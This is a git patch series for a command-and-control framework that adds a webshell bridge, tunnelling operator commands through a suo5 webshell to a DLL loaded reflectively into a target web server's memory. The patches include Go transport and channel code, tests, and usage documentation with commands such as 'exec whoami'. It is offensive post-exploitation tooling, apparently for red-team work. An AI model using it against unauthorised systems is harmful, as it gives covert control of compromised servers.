+++ b/server/cmd/webshell-bridge/transport.go
@@ -0,0 +1,131 @@
+package main
+
+import (
+	"context"
+	"fmt"
+	"net"
+	"net/url"
+	"sync"
+	"time"
+
+	proxysuo5 "github.com/chainreactors/proxyclient/suo5"
+	suo5core "github.com/zema1/suo5/suo5"
+)
+
+// Transport manages the suo5 tunnel connection to the target webshell.
+type Transport struct {
+	rawURL *url.URL              // parsed suo5/suo5s URL; validated in NewTransport
+	mu     sync.Mutex            // guards lazy init of client
+	client *proxysuo5.Suo5Client // created on first dial by initClient
+}
+
+// NewTransport creates a transport adapter for the given suo5 URL.
+// Supported schemes: suo5:// (HTTP), suo5s:// (HTTPS).
+// Validation only — the suo5 client itself is built lazily on first dial.
+func NewTransport(rawURL string) (*Transport, error) {
+	u, err := url.Parse(rawURL)
+	if err != nil {
+		return nil, fmt.Errorf("parse suo5 URL: %w", err)
+	}
+	if u.Scheme != "suo5" && u.Scheme != "suo5s" {
+		return nil, fmt.Errorf("unsupported suo5 scheme: %s", u.Scheme)
+	}
+	if u.Host == "" {
+		return nil, fmt.Errorf("missing suo5 host")
+	}
+
+	return &Transport{
+		rawURL: u,
+	}, nil
+}
+
+// Dial establishes a TCP connection through the suo5 tunnel to the given address.
+// The returned net.Conn transparently tunnels through the webshell's HTTP channel.
+// Equivalent to DialContext with a background context (no cancellation).
+func (t *Transport) Dial(network, address string) (net.Conn, error) {
+	return t.DialContext(context.Background(), network, address)
+}
+
+// DialContext establishes a TCP connection through the suo5 tunnel and binds
+// the initial HTTP request to ctx so cancellation interrupts the dial.
+// Only TCP network variants are accepted; a nil ctx is tolerated.
+func (t *Transport) DialContext(ctx context.Context, network, address string) (net.Conn, error) {
+	if err := t.initClient(); err != nil {
+		return nil, err
+	}
+	if ctx == nil {
+		ctx = context.Background()
+	}
+	switch network {
+	case "", "tcp", "tcp4", "tcp6":
+	default:
+		return nil, fmt.Errorf("unsupported network: %s", network)
+	}
+
+	conn := &suo5NetConn{
+		Suo5Conn: suo5core.NewSuo5Conn(ctx, t.client.Conf.Suo5Client),
+	}
+	// NOTE(review): on Connect failure the partially-built Suo5Conn is
+	// dropped without an explicit Close — confirm the suo5 library does
+	// not hold resources open in that state.
+	if err := conn.Connect(address); err != nil {
+		return nil, err
+	}
+	return conn, nil
+}
+
+// initClient lazily builds the suo5 client from the validated URL.
+// Safe for concurrent callers: the first one wins, the rest see t.client set.
+func (t *Transport) initClient() error {
+	t.mu.Lock()
+	defer t.mu.Unlock()
+
+	if t.client != nil {
+		return nil
+	}
+	if t.rawURL == nil {
+		return fmt.Errorf("missing suo5 URL")
+	}
+
+	conf, err := proxysuo5.NewConfFromURL(t.rawURL)
+	if err != nil {
+		return fmt.Errorf("init suo5 config: %w", err)
+	}
+	t.client = &proxysuo5.Suo5Client{
+		Proxy: t.rawURL,
+		Conf:  conf,
+	}
+	return nil
+}
+
+// suo5NetConn adapts a suo5 connection to net.Conn.
+// NOTE(review): remoteAddr is never assigned or read in this file — confirm
+// it is needed, otherwise drop it.
+type suo5NetConn struct {
+	*suo5core.Suo5Conn
+	remoteAddr string
+}
+
+// Write normalizes the return value from the underlying suo5 chunked writer.
+// In half-duplex mode the underlying Write wraps data in a frame and returns +// the frame length rather than the original data length. Callers (e.g. +// cio.WriteMsg) expect n == len(p) on success, so we fix it here. +func (conn *suo5NetConn) Write(p []byte) (int, error) { + n, err := conn.Suo5Conn.Write(p) + if err != nil { + return n, err + } + if n > len(p) { + n = len(p) + } + return n, nil +} + +func (conn *suo5NetConn) LocalAddr() net.Addr { + return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1)} +} + +func (conn *suo5NetConn) RemoteAddr() net.Addr { + return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1), Port: 0} +} + +func (conn *suo5NetConn) SetDeadline(_ time.Time) error { + return nil +} + +func (conn *suo5NetConn) SetReadDeadline(_ time.Time) error { + return nil +} + +func (conn *suo5NetConn) SetWriteDeadline(_ time.Time) error { + return nil +} diff --git a/server/cmd/webshell-bridge/transport_test.go b/server/cmd/webshell-bridge/transport_test.go new file mode 100644 index 00000000..17004a56 --- /dev/null +++ b/server/cmd/webshell-bridge/transport_test.go @@ -0,0 +1,58 @@ +package main + +import ( + "testing" +) + +func TestNewTransportValidURL(t *testing.T) { + tests := []struct { + name string + url string + }{ + {"suo5 HTTP", "suo5://target.com/suo5.jsp"}, + {"suo5 HTTPS", "suo5s://target.com/suo5.jsp"}, + {"suo5 with port", "suo5://target.com:8080/suo5.jsp"}, + {"suo5 with path", "suo5://10.0.0.1/app/suo5.aspx"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + tr, err := NewTransport(tt.url) + if err != nil { + t.Fatalf("NewTransport(%q) error: %v", tt.url, err) + } + if tr.rawURL == nil { + t.Fatal("rawURL is nil") + } + if tr.rawURL.Scheme == "" { + t.Fatal("rawURL scheme is empty") + } + if tr.rawURL.Host == "" { + t.Fatal("rawURL host is empty") + } + if tr.client != nil { + t.Fatal("client should be initialized lazily") + } + }) + } +} + +func TestNewTransportInvalidURL(t *testing.T) { + tests := []struct { + name string + 
url string + }{ + {"empty", ""}, + {"no scheme", "target.com/suo5.jsp"}, + {"bad scheme", "://target.com"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + _, err := NewTransport(tt.url) + if err == nil { + t.Fatalf("NewTransport(%q) expected error, got nil", tt.url) + } + }) + } +} From 046d21ecfe692c0bb6df65f0790cca4a3538865b Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:58 +0800 Subject: [PATCH 06/19] docs(protocol): add webshell bridge documentation --- docs/protocol/webshell-bridge.md | 156 +++++++++++++++++++++++++++++++ 1 file changed, 156 insertions(+) create mode 100644 docs/protocol/webshell-bridge.md diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md new file mode 100644 index 00000000..e60a84cb --- /dev/null +++ b/docs/protocol/webshell-bridge.md @@ -0,0 +1,156 @@ +# WebShell Bridge + +## Overview + +WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) by establishing a communication channel via suo5 HTTP tunnels. The architecture has three clean layers: + +- **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. No knowledge of rem/suo5/proxyclient required. +- **Implementation layer**: Bridge binary runs on the operator machine, managing transport (rem + proxyclient + suo5), session lifecycle, and task forwarding. +- **Transport layer**: The webshell only handles initial DLL loading and raw HTTP body send/receive. It never parses protocol bytes. 
+ +## Architecture + +``` +Product Layer (operator sees) +───────────────────────────── + Client/TUI + webshell new --listener my-listener + use + exec whoami + + Server + CustomPipeline(type="webshell") + Session appears like any other implant session + + +Bridge Binary (server/cmd/webshell-bridge/) +───────────────────────────────────────── + Runs on operator machine, connects to Server via ListenerRPC (mTLS) + + ┌─ transport adapter ──────────────────────────────────────┐ + │ rem (internal, not exposed as product concept) │ + │ proxyclient/suo5 (HTTP full-duplex tunnel) │ + └──────────────────────────────────────────────────────────┘ + + ┌─ spite/session adapter ──────────────────────────────────┐ + │ SpiteStream ↔ rem channel protocol translation │ + │ Session registration, checkin, task routing │ + └──────────────────────────────────────────────────────────┘ + + +Target Web Server Process +───────────────────────── + WebShell (JSP/PHP/ASPX) + - Initial bridge DLL loading (reflective/memory) + - HTTP body send/receive + - Pass raw bytes to bridge, no parsing + + Bridge Runtime DLL (in web server process memory) + ┌─ transport adapter ─────────────────────────────────┐ + │ rem server on 127.0.0.1: │ + │ Bridge binary connects as rem client via suo5 │ + └─────────────────────────────────────────────────────┘ + + ┌─ spite/session adapter ─────────────────────────────┐ + │ Receives Spite over rem channel │ + │ Routes to module runtime by spite.Name │ + └─────────────────────────────────────────────────────┘ + + ┌─ malefic module runtime ────────────────────────────┐ + │ exec / bof / execute_pe / upload / download / ... 
│ + │ All malefic modules available │ + └─────────────────────────────────────────────────────┘ +``` + +## Data Flow + +``` +Client exec("whoami") + → Server (SpiteStream) + → Bridge binary (session adapter) + → [rem channel through suo5 HTTP tunnel] + → Bridge Runtime DLL (module runtime) + → exec("whoami") → "root" + → Spite response over rem channel + → [suo5 HTTP tunnel] + → Bridge binary → SpiteStream.Send(response) + → Server → Client displays "root" +``` + +## Usage + +### 1. Run bridge binary + +```bash +webshell-bridge \ + --auth listener.auth \ + --suo5 suo5://target.com/suo5.jsp \ + --listener my-listener \ + --pipeline webshell_my-listener \ + --dll-addr 127.0.0.1:13338 +``` + +The `--dll-addr` flag tells the bridge binary which address to connect to through the suo5 tunnel (default: `127.0.0.1:13338`). This must match the DLL's compiled `DEFAULT_ADDR` in `malefic-bridge-dll/src/lib.rs` and the webshell's status probe port (`BRIDGE_DLL_PORT` in PHP, port constant in ASPX/JSP). Changing the port requires updating all three locations and recompiling the DLL. + +At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline start/stop/sync control. It does **not** auto-register or auto-start the `CustomPipeline`. + +### 2. Register and start the pipeline from Client/TUI + +``` +webshell new --listener my-listener +``` + +This creates `CustomPipeline(type="webshell")` and sends the pipeline start control to the already running bridge. + +### 3. Deploy suo5 webshell + bridge DLL on target + +Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. The webshell loads the bridge DLL into the web server process memory. The bridge DLL starts a rem server on `127.0.0.1:13338` (or the port matching `--dll-addr`). + +If the DLL is not loaded when the pipeline starts, the bridge keeps retrying `connectDLL` with exponential backoff until the rem server becomes reachable or the retry budget is exhausted. + +### 4. 
Interact + +``` +use +exec whoami +upload /local/file /remote/path +download /remote/file +``` + +## Rem Channel Protocol + +The bridge binary communicates with the bridge DLL using the rem wire protocol over a TCP connection tunneled through suo5. + +### Wire Format + +Each message: `[1 byte msg_type][4 bytes LE length][protobuf payload]` + +Uses `cio.WriteMsg`/`cio.ReadMsg` from `github.com/chainreactors/rem/protocol/cio`. + +### Session Lifecycle + +``` +1. Bridge dials DLL: transport.Dial("tcp", dllAddr) [through suo5] +2. Login handshake: Login{Agent: id, Mod: "bridge"} → Ack{Status: 1} +3. DLL sends: Packet{ID: 0, Data: Marshal(Register{SysInfo, Modules})} +4. Bridge registers session with server using real SysInfo/Modules +5. Task exchange: Packet{ID: taskID, Data: Marshal(Spite)} ↔ bidirectional +``` + +### DLL Requirements + +The bridge DLL (malefic create branch) must: +1. Start a rem-compatible TCP listener on the configured port +2. Accept Login, respond with Ack +3. Send a handshake Packet{ID: 0} containing serialized `implantpb.Register` +4. 
For each received Packet, unmarshal the Spite, execute the module, and reply with a Packet containing the response Spite + +## Key Files + +| Purpose | Path | +|---------|------| +| Bridge binary | `server/cmd/webshell-bridge/` | +| Rem channel | `server/cmd/webshell-bridge/channel.go` | +| Client commands | `client/command/pipeline/webshell.go` | +| CustomPipeline (server) | `server/listener/custom.go` | +| proxyclient/suo5 | `github.com/chainreactors/proxyclient/suo5` | From 49712dab37ac3b8c959859289f01288eca49ae1a Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 18:26:05 +0800 Subject: [PATCH 07/19] refactor(webshell-bridge): replace TCP transport with HTTP memory channel MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Remove suo5 TCP tunnel (transport.go) and rewrite Channel to communicate with the bridge DLL through HTTP POST requests with X-Stage headers. The webshell now calls DLL exports directly via function pointers — no TCP port opened on the target. Introduce ChannelIface for testability. 
--- server/cmd/webshell-bridge/bridge.go | 145 +---- server/cmd/webshell-bridge/bridge_test.go | 396 +++---------- server/cmd/webshell-bridge/channel.go | 391 +++++++------ server/cmd/webshell-bridge/channel_test.go | 578 +++++-------------- server/cmd/webshell-bridge/config.go | 17 +- server/cmd/webshell-bridge/main.go | 10 +- server/cmd/webshell-bridge/session.go | 12 +- server/cmd/webshell-bridge/transport.go | 131 ----- server/cmd/webshell-bridge/transport_test.go | 58 -- 9 files changed, 503 insertions(+), 1235 deletions(-) delete mode 100644 server/cmd/webshell-bridge/transport.go delete mode 100644 server/cmd/webshell-bridge/transport_test.go diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go index 2f1d374a..61673b0a 100644 --- a/server/cmd/webshell-bridge/bridge.go +++ b/server/cmd/webshell-bridge/bridge.go @@ -9,8 +9,6 @@ import ( "sync" "time" - "strings" - "github.com/chainreactors/IoM-go/consts" mtls "github.com/chainreactors/IoM-go/mtls" "github.com/chainreactors/IoM-go/proto/client/clientpb" @@ -19,7 +17,6 @@ import ( iomtypes "github.com/chainreactors/IoM-go/types" "github.com/chainreactors/logs" "github.com/chainreactors/malice-network/helper/cryptography" - "github.com/chainreactors/malice-network/helper/implanttypes" "google.golang.org/grpc" "google.golang.org/grpc/codes" "google.golang.org/grpc/metadata" @@ -40,8 +37,7 @@ const ( // The bridge owns the listener runtime only. Custom pipelines are created and // controlled through pipeline start/stop events from the server. 
type Bridge struct { - cfg *Config - transport dialTransport + cfg *Config conn *grpc.ClientConn rpc listenerrpc.ListenerRPCClient @@ -52,29 +48,19 @@ type Bridge struct { } type pipelineRuntime struct { - name string - ctx context.Context - cancel context.CancelFunc - spiteStream listenerrpc.ListenerRPC_SpiteStreamClient - sendMu sync.Mutex - sessions sync.Map // sessionID -> *Session - sessionsByRawID sync.Map // rawSID (uint32) -> *Session (for CtrlListenerSyncSession lookup) - streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) - secureConfig *implanttypes.SecureConfig - done chan struct{} + name string + ctx context.Context + cancel context.CancelFunc + spiteStream listenerrpc.ListenerRPC_SpiteStreamClient + sendMu sync.Mutex + sessions sync.Map // sessionID -> *Session + streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) + done chan struct{} } // NewBridge creates a new bridge instance. func NewBridge(cfg *Config) (*Bridge, error) { - transport, err := NewTransport(cfg.Suo5URL) - if err != nil { - return nil, fmt.Errorf("init transport: %w", err) - } - - return &Bridge{ - cfg: cfg, - transport: transport, - }, nil + return &Bridge{cfg: cfg}, nil } // Start runs the bridge lifecycle: @@ -118,14 +104,15 @@ func (b *Bridge) Start(parent context.Context) error { return b.runJobLoop(ctx) } -// connectDLL establishes a malefic channel to the bind DLL on the target -// through the suo5 tunnel. Retries with exponential backoff up to -// retryMaxAttempts before giving up. +// connectDLL establishes a channel to the DLL on the target. +// Sends HTTP requests to the webshell which calls DLL exports directly +// via function pointers (memory channel). No TCP port opened on target. +// Retries with exponential backoff up to retryMaxAttempts before giving up. 
func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error { sessionID := cryptography.RandomString(8) - channel := NewChannel(b.transport, b.cfg.DLLAddr, runtime.name) - logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.DLLAddr) + channel := NewChannel(b.cfg.WebshellHTTPURL(), b.cfg.StageToken) + logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.WebshellHTTPURL()) delay := retryBaseDelay for attempt := 1; attempt <= retryMaxAttempts; attempt++ { @@ -154,16 +141,8 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } break } - logs.Log.Important("DLL connected via malefic channel") - // Inject Age keys before Handshake so the parser can decrypt/encrypt. - if runtime.secureConfig != nil && runtime.secureConfig.Enable { - keyPair := buildInitialKeyPair(runtime.secureConfig) - if keyPair != nil { - channel.WithSecure(keyPair) - logs.Log.Debugf("Age secure mode active for DLL channel") - } - } + logs.Log.Important("DLL connected via memory channel") sess, err := NewSession( b.rpc, b.pipelineCtx(ctx, runtime.name), @@ -177,29 +156,9 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error channel.StartRecvLoop() runtime.sessions.Store(sess.ID, sess) - runtime.sessionsByRawID.Store(channel.sessionID, sess) return nil } -// buildInitialKeyPair assembles a KeyPair from the pipeline's SecureConfig. -// PrivateKey = server private key (to decrypt DLL messages). -// PublicKey = implant public key (to encrypt messages to DLL). -// This mirrors core.GetKeyPairForSession without per-session lookup. 
-func buildInitialKeyPair(sc *implanttypes.SecureConfig) *clientpb.KeyPair { - if sc == nil || !sc.Enable { - return nil - } - pub := strings.TrimSpace(sc.ImplantPublicKey) - priv := strings.TrimSpace(sc.ServerPrivateKey) - if pub == "" && priv == "" { - return nil - } - return &clientpb.KeyPair{ - PublicKey: pub, - PrivateKey: priv, - } -} - // connect establishes the mTLS gRPC connection to the server. func (b *Bridge) connect(ctx context.Context) error { authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) @@ -256,13 +215,6 @@ func (b *Bridge) runJobLoop(ctx context.Context) error { return fmt.Errorf("job stream recv: %w", err) } - // Handle session key sync without sending a status response, - // matching the real listener behavior (server/listener/listener.go:360). - if msg.GetCtrl() == consts.CtrlListenerSyncSession { - b.handleSyncSession(msg.GetSession()) - continue - } - statusMsg := b.handleJobCtrl(ctx, msg) if err := b.jobStream.Send(statusMsg); err != nil { if ctx.Err() != nil { @@ -315,18 +267,12 @@ func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) err return err } - secCfg := implanttypes.FromSecure(pipe.GetSecure()) - if secCfg.Enable { - logs.Log.Importantf("pipeline %s: Age secure mode enabled", pipe.GetName()) - } - runtimeCtx, cancel := context.WithCancel(ctx) runtime := &pipelineRuntime{ - name: pipe.GetName(), - ctx: runtimeCtx, - cancel: cancel, - secureConfig: secCfg, - done: make(chan struct{}), + name: pipe.GetName(), + ctx: runtimeCtx, + cancel: cancel, + done: make(chan struct{}), } b.activeMu.Lock() @@ -351,7 +297,7 @@ func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) err runtime.spiteStream = spiteStream go b.runRuntime(runtime) - logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.DLLAddr) + logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.WebshellHTTPURL()) return nil } @@ -379,53 +325,6 @@ func (b *Bridge) 
handlePipelineSync(job *clientpb.Job) error { return nil } -// handleSyncSession processes CtrlListenerSyncSession from the server. -// The server pushes per-session Age key pairs after a session registers with -// secure mode enabled. We update the channel's parser so subsequent -// reads/writes use the session-specific keys. -func (b *Bridge) handleSyncSession(sess *clientpb.Session) { - if sess == nil { - return - } - - b.activeMu.Lock() - runtime := b.active - b.activeMu.Unlock() - if runtime == nil { - return - } - - rawID := sess.GetRawId() - val, ok := runtime.sessionsByRawID.Load(rawID) - if !ok { - logs.Log.Debugf("sync session: no session for raw ID %d", rawID) - return - } - - session := val.(*Session) - kp := sess.GetKeyPair() - if kp == nil || (kp.GetPublicKey() == "" && kp.GetPrivateKey() == "") { - logs.Log.Debugf("sync session %s: no key pair, skipping", session.ID) - return - } - - // Merge: session-specific private key takes priority, fall back to pipeline's. - merged := &clientpb.KeyPair{ - PublicKey: kp.GetPublicKey(), - PrivateKey: kp.GetPrivateKey(), - } - if runtime.secureConfig != nil { - pipelinePriv := strings.TrimSpace(runtime.secureConfig.ServerPrivateKey) - sessionPriv := strings.TrimSpace(kp.GetPrivateKey()) - if pipelinePriv != "" && sessionPriv != pipelinePriv { - merged.PrivateKey = sessionPriv + "\n" + pipelinePriv - } - } - - session.channel.WithSecure(merged) - logs.Log.Debugf("sync session %s: Age keys updated (rawID=%d)", session.ID, rawID) -} - func (b *Bridge) jobPipelineName(job *clientpb.Job) (string, error) { if job == nil { return "", fmt.Errorf("missing job") diff --git a/server/cmd/webshell-bridge/bridge_test.go b/server/cmd/webshell-bridge/bridge_test.go index bf5e3b4a..5ac64c06 100644 --- a/server/cmd/webshell-bridge/bridge_test.go +++ b/server/cmd/webshell-bridge/bridge_test.go @@ -5,7 +5,6 @@ import ( "errors" "fmt" "io" - "net" "sync" "testing" "time" @@ -13,47 +12,11 @@ import ( 
"github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/IoM-go/proto/implant/implantpb" "github.com/chainreactors/IoM-go/proto/services/listenerrpc" - "github.com/chainreactors/malice-network/helper/implanttypes" - malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" "google.golang.org/grpc" "google.golang.org/grpc/metadata" "google.golang.org/protobuf/proto" ) -type blockingDialTransport struct { - started chan struct{} -} - -func (t *blockingDialTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { - select { - case <-t.started: - default: - close(t.started) - } - <-ctx.Done() - return nil, ctx.Err() -} - -// badHandshakeTransport returns a connection that sends an invalid malefic frame. -type badHandshakeTransport struct{} - -func (t *badHandshakeTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { - clientConn, serverConn := net.Pipe() - go func() { - defer serverConn.Close() - // Send a malefic frame with corrupt payload (invalid protobuf) - frame := []byte{ - malefic.DefaultStartDelimiter, - 0x01, 0x00, 0x00, 0x00, // sessionID = 1 - 0x03, 0x00, 0x00, 0x00, // length = 3 - 0xBA, 0xAD, 0x00, // corrupt payload - malefic.DefaultEndDelimiter, - } - serverConn.Write(frame) - }() - return clientConn, nil -} - type fakeBridgeRPC struct { listenerrpc.ListenerRPCClient @@ -100,112 +63,18 @@ func newFakeSpiteStream() *fakeSpiteStream { func (f *fakeSpiteStream) Header() (metadata.MD, error) { return nil, nil } func (f *fakeSpiteStream) Trailer() metadata.MD { return nil } func (f *fakeSpiteStream) CloseSend() error { - f.closeOnce.Do(func() { - close(f.closed) - }) + f.closeOnce.Do(func() { close(f.closed) }) return nil } -func (f *fakeSpiteStream) Context() context.Context { return context.Background() } -func (f *fakeSpiteStream) SendMsg(m interface{}) error { - return nil -} -func (f *fakeSpiteStream) RecvMsg(m interface{}) error { - 
<-f.closed - return io.EOF -} +func (f *fakeSpiteStream) Context() context.Context { return context.Background() } +func (f *fakeSpiteStream) SendMsg(m interface{}) error { return nil } +func (f *fakeSpiteStream) RecvMsg(m interface{}) error { <-f.closed; return io.EOF } func (f *fakeSpiteStream) Send(*clientpb.SpiteResponse) error { return nil } func (f *fakeSpiteStream) Recv() (*clientpb.SpiteRequest, error) { <-f.closed return nil, io.EOF } -func TestHandlePipelineStartReturnsBeforeDLLConnectCompletes(t *testing.T) { - transport := &blockingDialTransport{started: make(chan struct{})} - bridge := &Bridge{ - cfg: &Config{ - ListenerName: "listener-a", - DLLAddr: "127.0.0.1:13338", - }, - transport: transport, - rpc: &fakeBridgeRPC{ - spiteStream: newFakeSpiteStream(), - }, - } - - job := &clientpb.Job{ - Name: "ws-a", - Pipeline: &clientpb.Pipeline{ - Name: "ws-a", - Type: pipelineType, - }, - } - - errCh := make(chan error, 1) - go func() { - errCh <- bridge.handlePipelineStart(context.Background(), job) - }() - - select { - case err := <-errCh: - if err != nil { - t.Fatalf("handlePipelineStart returned error: %v", err) - } - case <-time.After(300 * time.Millisecond): - t.Fatal("handlePipelineStart blocked on DLL connect") - } - - select { - case <-transport.started: - case <-time.After(time.Second): - t.Fatal("background DLL connect was not started") - } - - if err := bridge.stopActiveRuntime("ws-a"); err != nil { - t.Fatalf("stopActiveRuntime failed: %v", err) - } -} - -func TestRunRuntimeSyncsPipelineStopAfterUnexpectedConnectFailure(t *testing.T) { - rpc := &fakeBridgeRPC{spiteStream: newFakeSpiteStream()} - bridge := &Bridge{ - cfg: &Config{ - ListenerName: "listener-b", - DLLAddr: "127.0.0.1:13338", - }, - transport: &badHandshakeTransport{}, - rpc: rpc, - } - - job := &clientpb.Job{ - Name: "ws-b", - Pipeline: &clientpb.Pipeline{ - Name: "ws-b", - Type: pipelineType, - }, - } - - if err := bridge.handlePipelineStart(context.Background(), job); err != nil { 
- t.Fatalf("handlePipelineStart failed: %v", err) - } - - deadline := time.Now().Add(time.Second) - for time.Now().Before(deadline) { - calls := rpc.StopCalls() - if len(calls) == 1 { - if calls[0].GetName() != "ws-b" { - t.Fatalf("stop name = %q, want %q", calls[0].GetName(), "ws-b") - } - if calls[0].GetListenerId() != "listener-b" { - t.Fatalf("stop listener_id = %q, want %q", calls[0].GetListenerId(), "listener-b") - } - return - } - time.Sleep(10 * time.Millisecond) - } - - t.Fatal("expected background stop sync after connect failure") -} - // collectingSpiteStream records all sent SpiteResponses for test assertions. type collectingSpiteStream struct { grpc.ClientStream @@ -217,9 +86,7 @@ type collectingSpiteStream struct { } func newCollectingSpiteStream() *collectingSpiteStream { - return &collectingSpiteStream{ - closed: make(chan struct{}), - } + return &collectingSpiteStream{closed: make(chan struct{})} } func (s *collectingSpiteStream) Header() (metadata.MD, error) { return nil, nil } @@ -228,14 +95,9 @@ func (s *collectingSpiteStream) CloseSend() error { s.recvOnce.Do(func() { close(s.closed) }) return nil } -func (s *collectingSpiteStream) Context() context.Context { return context.Background() } -func (s *collectingSpiteStream) SendMsg(m interface{}) error { - return nil -} -func (s *collectingSpiteStream) RecvMsg(m interface{}) error { - <-s.closed - return io.EOF -} +func (s *collectingSpiteStream) Context() context.Context { return context.Background() } +func (s *collectingSpiteStream) SendMsg(m interface{}) error { return nil } +func (s *collectingSpiteStream) RecvMsg(m interface{}) error { <-s.closed; return io.EOF } func (s *collectingSpiteStream) Send(resp *clientpb.SpiteResponse) error { s.mu.Lock() s.sent = append(s.sent, proto.Clone(resp).(*clientpb.SpiteResponse)) @@ -254,56 +116,15 @@ func (s *collectingSpiteStream) Sent() []*clientpb.SpiteResponse { return out } -func TestForwardToSessionStreaming(t *testing.T) { - // Set up a mock DLL 
that sends 3 streaming responses for one task - mock := newMockMaleficDLL(t) - defer mock.close() - - const taskID uint32 = 500 - const numResponses = 3 - - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return - } - defer conn.Close() - - // Send handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, - } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read the initial streaming request - testReadMaleficFrame(conn) - - // Send multiple responses for the same task - for i := 0; i < numResponses; i++ { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - { - Name: fmt.Sprintf("stream-resp-%d", i), - TaskId: taskID, - }, - }, - } - testWriteMaleficFrame(conn, resp, mock.sessionID) - } - }() +func TestForwardToSessionUnary(t *testing.T) { + srv, _ := startMockWebshell(t) - // Build a real channel + session - ch := dialMockDLL(t, mock.addr()) + ch := NewChannel(srv.URL, "") defer ch.Close() - reg, err := ch.Handshake() - if err != nil { + if _, err := ch.Handshake(); err != nil { t.Fatalf("handshake: %v", err) } - _ = reg - ch.StartRecvLoop() session := &Session{ @@ -326,52 +147,70 @@ func TestForwardToSessionStreaming(t *testing.T) { } runtime.sessions.Store(session.ID, session) - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, - } + bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - // Forward with streaming task (Total = -1) req := &clientpb.SpiteRequest{ Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: taskID, Total: -1}, - Spite: &implantpb.Spite{Name: "start-pty"}, + Task: &clientpb.Task{TaskId: 1, Total: 1}, + Spite: &implantpb.Spite{Name: "exec"}, } - bridge.forwardToSession(runtime, session.ID, taskID, req) - - // Wait for all streaming responses to be forwarded - deadline := time.Now().Add(3 * time.Second) - for time.Now().Before(deadline) { - sent := stream.Sent() - if 
len(sent) >= numResponses { - break - } - time.Sleep(50 * time.Millisecond) - } + bridge.forwardToSession(runtime, session.ID, 1, req) sent := stream.Sent() - if len(sent) != numResponses { - t.Fatalf("expected %d responses, got %d", numResponses, len(sent)) + if len(sent) != 1 { + t.Fatalf("expected 1 response, got %d", len(sent)) } - for i, resp := range sent { - expected := fmt.Sprintf("stream-resp-%d", i) - if resp.GetSpite().GetName() != expected { - t.Errorf("response %d: expected %q, got %q", i, expected, resp.GetSpite().GetName()) - } - if resp.GetTaskId() != taskID { - t.Errorf("response %d: expected taskID %d, got %d", i, taskID, resp.GetTaskId()) - } + if sent[0].GetSpite().GetName() != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) } - } -func TestForwardToSessionUnary(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() +func TestForwardToSessionStreaming(t *testing.T) { + srv, mock := startMockWebshell(t) - go mock.serve(t, 1) // Handshake + 1 Spite roundtrip + var callCount int + var mu sync.Mutex + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("LOADED"), 200 + } + if stage == "init" { + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + sid[0] = byte(mock.sessionID) + return append(sid, regData...), 200 + } + if stage == "spite" { + // Parse input + inSpites := &implantpb.Spites{} + if len(body) > 0 { + proto.Unmarshal(body, inSpites) + } - ch := dialMockDLL(t, mock.addr()) + mu.Lock() + callCount++ + n := callCount + mu.Unlock() + + // First few calls: return streaming responses for task 500 + if n <= 3 { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: fmt.Sprintf("stream-resp-%d", n-1), + TaskId: 500, + }}, + } + data, _ := proto.Marshal(resp) + return data, 200 + } + empty, _ := proto.Marshal(&implantpb.Spites{}) + return empty, 200 + } + return nil, 404 + }) + + ch := NewChannel(srv.URL, "") 
